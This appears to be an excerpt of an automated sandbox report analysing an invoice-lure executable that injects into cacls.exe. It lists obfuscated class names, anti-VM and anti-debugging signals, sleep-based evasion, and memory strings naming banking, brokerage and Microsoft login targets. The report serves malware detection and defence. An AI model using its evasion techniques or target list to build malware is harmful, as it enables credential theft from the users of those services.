                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, vNreVtHhI7bdxK0U6h.csHigh entropy of concatenated method names: 'lt28dd66y9', 'tAD8C8axJo', 'achw9tdSeQ', 'mgyw79IUxf', 'NFV8iyltvv', 'zXP8coTNts', 'F288tpVps9', 'gRZ8lesZmF', 'Jim8Defjp1', 'DHX86Yp7pu'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, BuralZpkmre0DVVjIO.csHigh entropy of concatenated method names: 'JlI70b4KLj', 'CfO7GHtg2I', 'Cpv7g4GxRi', 'O107eRC1J6', 'O4n7vvOD6E', 'VZ87fXd0kh', 'tZaOJIyGrVSjoaFGC3', 'DUypSI7nUtChZwAWUW', 'cTk77447DZ', 'WSk7TcH0ZH'
                Source: 0.2.profroma invoice.exe.42d6df0.2.raw.unpack, bUOMmeoDL6PiGfD392.csHigh entropy of concatenated method names: 'tNY0UmP5sh', 'GCZ0WlpT54', 'pRT0PmQWl5', 'dxNPCF5pJ1', 'Qr2PzaW6Vj', 'l8k09yhKcV', 'jHs07Q74p0', 'RCF0rKXSU9', 'SXa0Tmlopb', 'hZ60pdQpCp'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, L9k0Y8CgHkeJjCg3eV.csHigh entropy of concatenated method names: 'YouJWHLFoS', 'Sc7JKSo3cK', 'gkhJPSYNfh', 'BHEJ0aeZiA', 'NWkJEHcMdb', 'Vi6JGICbLS', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, xQIZVIrf6sT7DxqM3I.csHigh entropy of concatenated method names: 'QQpVZygmS', 'QN74CXQGn', 'cvnAnib6Z', 'VJtj1wyLd', 'tuEIvaDcB', 'aiq3e2844', 'KgbNbC8MuSXuTecKMg', 'zwQCbadmZPfwlSelEe', 'MSTw0qlfi', 'C3LJsLdo9'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, Nr6ZI2z2MS966uGdTs.csHigh entropy of concatenated method names: 'owxJAs8p5q', 'I1CJXb5LXs', 'zbCJI3swH1', 'URVJnbOiBG', 'OHcJxqYkyL', 'V0sJqc5pPc', 'XY5JNaqAEC', 'lRMJ2fcmZW', 'VY3JOmRuVZ', 'ULVJYchBDw'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, rNyObfMmS0nIkxXusY.csHigh entropy of concatenated method names: 'HX10OlMM63', 'nfl0YSHKjl', 'ycD0VOj0Ln', 'FGP04rX0bb', 'qm70BcxN5T', 'hS00ANR8tZ', 'DMZ0j1JcSW', 'CTr0XqksW9', 'VB10Ig78xd', 'A2i03ot8lN'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, E69Zsv7pxWg5OSmhEhH.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YIsyEQ1rIg', 'koVyJnxWib', 'vkAyasHD20', 'vm5yyoKAfn', 'PhlykrZid2', 'v8Yy17CFla', 'Syfy2EXjCs'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, FgYs106YRjqCKNvYCX.csHigh entropy of concatenated method names: 'ToString', 'f4WfiL1t1t', 'w4YfxdCDxF', 'AcxfsIgZkh', 'IxAfq4pTwf', 'Vv5fNyvNaH', 'u0wf5wso3l', 'Yh2fohu0qM', 'SKjfFWHqfF', 'GDDfM1MQlr'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, jvEMfV7rQWSl2v48DAa.csHigh entropy of concatenated method names: 'ToString', 'YxAaXmQMnJ', 'PljaIgBGbK', 'HFCa3pfHgv', 'aNqanUNEgs', 'cMHaxZysmi', 'v7vasefklK', 'TkfaqvH1wb', 'GjdWmGs1OhYBMn2fgxB', 'b6M93WsqFH1gIl9gXZV'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, YymjjgSxYJipegrgUk.csHigh entropy of concatenated method names: 'f1oEvTWaiS', 'VNyE8wbheD', 'x5REEPuuQK', 'f4iEau8k8J', 'nCwEk25HOe', 'CQHE2cb4G6', 'Dispose', 'pCvwUIxMKx', 'B7wwbefjh2', 'dERwWu5c1e'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, nDjOWhGfh6WE4H8O43.csHigh entropy of concatenated method names: 's4KTLBnPXh', 'EZgTUOsLxJ', 'WWHTba0hJy', 'xNUTWRAjAc', 'Jt4TKKAxkU', 'IgTTPVorlS', 'JIWT0mXmuw', 't4JTGIr9Nf', 'YYVTZQGeqi', 'aMBTgmHTpV'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, HXNWPLmEsnSGE9gOPp.csHigh entropy of concatenated method names: 'djb8gST1yI', 'IO38euZl8Y', 'ToString', 'B838UtXnSA', 'BZ88btLrOC', 'lXc8W7Lsbh', 'Kni8Kxhgs1', 'ptG8PgdfYE', 'Een809sYp1', 'kaF8GcOXBa'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, Eb4KLjXAfOHtg2I0k0.csHigh entropy of concatenated method names: 'hJxblWli0r', 'T5dbDpSQ5V', 'GG7b61t5di', 'DB4bmXW1fn', 'YiNbQJHJV7', 'KOYbHOkg7A', 'Vh8bSO6OI4', 'v1hbdckjGW', 'PIZbhECVou', 'hIYbCPVWYP'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, QGouHtlnoTJGfnggnS.csHigh entropy of concatenated method names: 'pw8vu7nhox', 'BSevcrrFdX', 'o6fvl9vBiY', 'xgovDOrSSD', 'WpVvxOYOiP', 'kHIvsaCWoP', 'gfBvqtm7dy', 'jGGvNKeAnP', 'sU0v5pMrP2', 'BclvomDf9L'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, Y1J62X3yWJcvRi4nvO.csHigh entropy of concatenated method names: 'dhlKBVFepG', 'loYKj8If9K', 'pJDWsZvxMe', 'DivWqQ92DW', 'K1lWNnii1a', 'QkvW5N9Hg3', 'dTmWo9g4m3', 'koQWFi0nkZ', 'KMGWMkkQU6', 'jAeWuF0JsY'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, WgXcR5tZCEPlalIhRN.csHigh entropy of concatenated method names: 'CZNRX9BL5W', 'siHRI9ySw2', 'vyvRnRn7qO', 'rDgRxY41Uu', 'vDwRqo45Ec', 'wqIRNu0X4E', 'JajRo8ggCk', 'WZJRF9But5', 'SpxRuNyRn0', 'zVPRigq19y'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, eqwVjZhjtGw95m3lNk.csHigh entropy of concatenated method names: 'D53En4lv1D', 'hZfExstyRd', 't5CEsNpk3p', 'yFeEqlA8nf', 'hkiENUEGbM', 'O14E59PS9c', 'nWiEo6RQ9H', 'maPEFW3CxI', 'jPtEM96qrt', 'JnHEugBGZ3'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, S6ESZ8nXd0khtHVDWT.csHigh entropy of concatenated method names: 'mAvPLk9RpH', 'E4uPboelVT', 'CJDPKygXHq', 'vbGP0MGPf5', 'elvPG33G1U', 'YMgKQSrQs5', 'zDVKHIFpKj', 'SaVKSfHYQ9', 's8oKd6rxCL', 'FhcKh1mkIF'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, rcMTIsbMF7EyDhd8bP.csHigh entropy of concatenated method names: 'Dispose', 'sip7hegrgU', 'd2rrxqIJmM', 'Cw6sQl5TRs', 'uAY7CxtbDh', 'MYn7zBGCIg', 'ProcessDialogKey', 'KdLr9qwVjZ', 'DtGr7w95m3', 'QNkrro9k0Y'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, ycy97jIpv4GxRii10R.csHigh entropy of concatenated method names: 'd2KW4TFWiG', 'npEWAXw7e0', 'QUmWXZaBrV', 'TNgWIfbsbq', 'DQWWv2RHw4', 'baEWfJjS30', 'ES6W8PWuTm', 'ywkWwx17vY', 'dTmWEqPfhW', 'TUWWJaAjr5'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, Eu11kY77jLWEAJL7Za6.csHigh entropy of concatenated method names: 'leRJCMr9yo', 'I4xJzsUolI', 'yRsa9Ga2yu', 'i3Xa7tn1Wo', 'x6earKREvb', 'x0naTuXOUR', 'd4napF7ELc', 'MMraLBrWOC', 'QgJaUBevu6', 'BtMabUYl1V'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, PwM3qZ79O8r4sVfKe3v.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eZOJiyid2c', 'V4LJcEXbOl', 'J8MJttRvLE', 'bsfJlNJBPa', 'XJuJDsbsia', 'kdpJ6hVUvP', 'oIQJmglS7u'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, vNreVtHhI7bdxK0U6h.csHigh entropy of concatenated method names: 'lt28dd66y9', 'tAD8C8axJo', 'achw9tdSeQ', 'mgyw79IUxf', 'NFV8iyltvv', 'zXP8coTNts', 'F288tpVps9', 'gRZ8lesZmF', 'Jim8Defjp1', 'DHX86Yp7pu'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, BuralZpkmre0DVVjIO.csHigh entropy of concatenated method names: 'JlI70b4KLj', 'CfO7GHtg2I', 'Cpv7g4GxRi', 'O107eRC1J6', 'O4n7vvOD6E', 'VZ87fXd0kh', 'tZaOJIyGrVSjoaFGC3', 'DUypSI7nUtChZwAWUW', 'cTk77447DZ', 'WSk7TcH0ZH'
                Source: 0.2.profroma invoice.exe.7cb0000.4.raw.unpack, bUOMmeoDL6PiGfD392.csHigh entropy of concatenated method names: 'tNY0UmP5sh', 'GCZ0WlpT54', 'pRT0PmQWl5', 'dxNPCF5pJ1', 'Qr2PzaW6Vj', 'l8k09yhKcV', 'jHs07Q74p0', 'RCF0rKXSU9', 'SXa0Tmlopb', 'hZ60pdQpCp'
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: profroma invoice.exe PID: 5592, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF8C88ED324
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF8C88ED7E4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF8C88ED944
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF8C88ED504
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF8C88ED544
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF8C88ED1E4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF8C88F0154
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FF8C88EDA44
                Source: C:\Users\user\Desktop\profroma invoice.exeMemory allocated: 1800000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeMemory allocated: 3200000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeMemory allocated: 18A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeMemory allocated: 93F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeMemory allocated: 7E80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeMemory allocated: A3F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeMemory allocated: B3F0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0176096E rdtsc 4_2_0176096E
                Source: C:\Users\user\Desktop\profroma invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\cacls.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\profroma invoice.exe TID: 1400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 6728Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 6728Thread sleep time: -62000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe TID: 5248Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 7_2_0274C940 FindFirstFileW,FindNextFileW,FindClose,7_2_0274C940
                Source: C:\Users\user\Desktop\profroma invoice.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: t577G2K6.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: t577G2K6.7.drBinary or memory string: discord.comVMware20,11696428655f
                Source: t577G2K6.7.drBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: t577G2K6.7.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: t577G2K6.7.drBinary or memory string: global block list test formVMware20,11696428655
                Source: t577G2K6.7.drBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: vEErKBMCpBGs.exe, 00000008.00000002.3924941249.0000000000B4F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllT
                Source: t577G2K6.7.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: t577G2K6.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: t577G2K6.7.drBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: t577G2K6.7.drBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: t577G2K6.7.drBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: t577G2K6.7.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: t577G2K6.7.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: t577G2K6.7.drBinary or memory string: outlook.office365.comVMware20,11696428655t
                Source: t577G2K6.7.drBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: cacls.exe, 00000007.00000002.3924027497.0000000002C31000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.3116930875.000001A2A4F7C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: t577G2K6.7.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: t577G2K6.7.drBinary or memory string: outlook.office.comVMware20,11696428655s
                Source: t577G2K6.7.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: t577G2K6.7.drBinary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: t577G2K6.7.drBinary or memory string: AMC password management pageVMware20,11696428655
                Source: t577G2K6.7.drBinary or memory string: tasks.office.comVMware20,11696428655o
                Source: t577G2K6.7.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: t577G2K6.7.drBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: t577G2K6.7.drBinary or memory string: interactivebrokers.comVMware20,11696428655
                Source: t577G2K6.7.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: t577G2K6.7.drBinary or memory string: dev.azure.comVMware20,11696428655j
                Source: t577G2K6.7.drBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: t577G2K6.7.drBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: t577G2K6.7.drBinary or memory string: bankofamerica.comVMware20,11696428655x
                Source: t577G2K6.7.drBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: t577G2K6.7.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0176096E rdtsc 4_2_0176096E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_00417E43 LdrLoadDll,4_2_00417E43
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4164 mov eax, dword ptr fs:[00000030h]4_2_017F4164
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F4164 mov eax, dword ptr fs:[00000030h]4_2_017F4164
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B8158 mov eax, dword ptr fs:[00000030h]4_2_017B8158
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01726154 mov eax, dword ptr fs:[00000030h]4_2_01726154
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01726154 mov eax, dword ptr fs:[00000030h]4_2_01726154
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171C156 mov eax, dword ptr fs:[00000030h]4_2_0171C156
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B4144 mov eax, dword ptr fs:[00000030h]4_2_017B4144
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B4144 mov eax, dword ptr fs:[00000030h]4_2_017B4144
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B4144 mov ecx, dword ptr fs:[00000030h]4_2_017B4144
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B4144 mov eax, dword ptr fs:[00000030h]4_2_017B4144
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B4144 mov eax, dword ptr fs:[00000030h]4_2_017B4144
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01750124 mov eax, dword ptr fs:[00000030h]4_2_01750124
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CA118 mov ecx, dword ptr fs:[00000030h]4_2_017CA118
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CA118 mov eax, dword ptr fs:[00000030h]4_2_017CA118
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CA118 mov eax, dword ptr fs:[00000030h]4_2_017CA118
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CA118 mov eax, dword ptr fs:[00000030h]4_2_017CA118
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E0115 mov eax, dword ptr fs:[00000030h]4_2_017E0115
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE10E mov ecx, dword ptr fs:[00000030h]4_2_017CE10E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE10E mov ecx, dword ptr fs:[00000030h]4_2_017CE10E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE10E mov ecx, dword ptr fs:[00000030h]4_2_017CE10E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE10E mov eax, dword ptr fs:[00000030h]4_2_017CE10E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017CE10E mov ecx, dword ptr fs:[00000030h]4_2_017CE10E
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017501F8 mov eax, dword ptr fs:[00000030h]4_2_017501F8
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017F61E5 mov eax, dword ptr fs:[00000030h]4_2_017F61E5
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E1D0 mov eax, dword ptr fs:[00000030h]4_2_0179E1D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E1D0 mov eax, dword ptr fs:[00000030h]4_2_0179E1D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E1D0 mov ecx, dword ptr fs:[00000030h]4_2_0179E1D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E1D0 mov eax, dword ptr fs:[00000030h]4_2_0179E1D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0179E1D0 mov eax, dword ptr fs:[00000030h]4_2_0179E1D0
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E61C3 mov eax, dword ptr fs:[00000030h]4_2_017E61C3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017E61C3 mov eax, dword ptr fs:[00000030h]4_2_017E61C3
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A019F mov eax, dword ptr fs:[00000030h]4_2_017A019F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A019F mov eax, dword ptr fs:[00000030h]4_2_017A019F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A019F mov eax, dword ptr fs:[00000030h]4_2_017A019F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A019F mov eax, dword ptr fs:[00000030h]4_2_017A019F
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171A197 mov eax, dword ptr fs:[00000030h]4_2_0171A197
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171A197 mov eax, dword ptr fs:[00000030h]4_2_0171A197
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171A197 mov eax, dword ptr fs:[00000030h]4_2_0171A197
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01760185 mov eax, dword ptr fs:[00000030h]4_2_01760185
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017DC188 mov eax, dword ptr fs:[00000030h]4_2_017DC188
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017DC188 mov eax, dword ptr fs:[00000030h]4_2_017DC188
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C4180 mov eax, dword ptr fs:[00000030h]4_2_017C4180
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017C4180 mov eax, dword ptr fs:[00000030h]4_2_017C4180
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0174C073 mov eax, dword ptr fs:[00000030h]4_2_0174C073
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_01722050 mov eax, dword ptr fs:[00000030h]4_2_01722050
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A6050 mov eax, dword ptr fs:[00000030h]4_2_017A6050
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017B6030 mov eax, dword ptr fs:[00000030h]4_2_017B6030
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171A020 mov eax, dword ptr fs:[00000030h]4_2_0171A020
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0171C020 mov eax, dword ptr fs:[00000030h]4_2_0171C020
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173E016 mov eax, dword ptr fs:[00000030h]4_2_0173E016
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173E016 mov eax, dword ptr fs:[00000030h]4_2_0173E016
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173E016 mov eax, dword ptr fs:[00000030h]4_2_0173E016
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_0173E016 mov eax, dword ptr fs:[00000030h]4_2_0173E016
                Source: C:\Users\user\Desktop\profroma invoice.exeCode function: 4_2_017A4000 mov ecx, dword ptr fs:[00000030h]4_2_017A4000
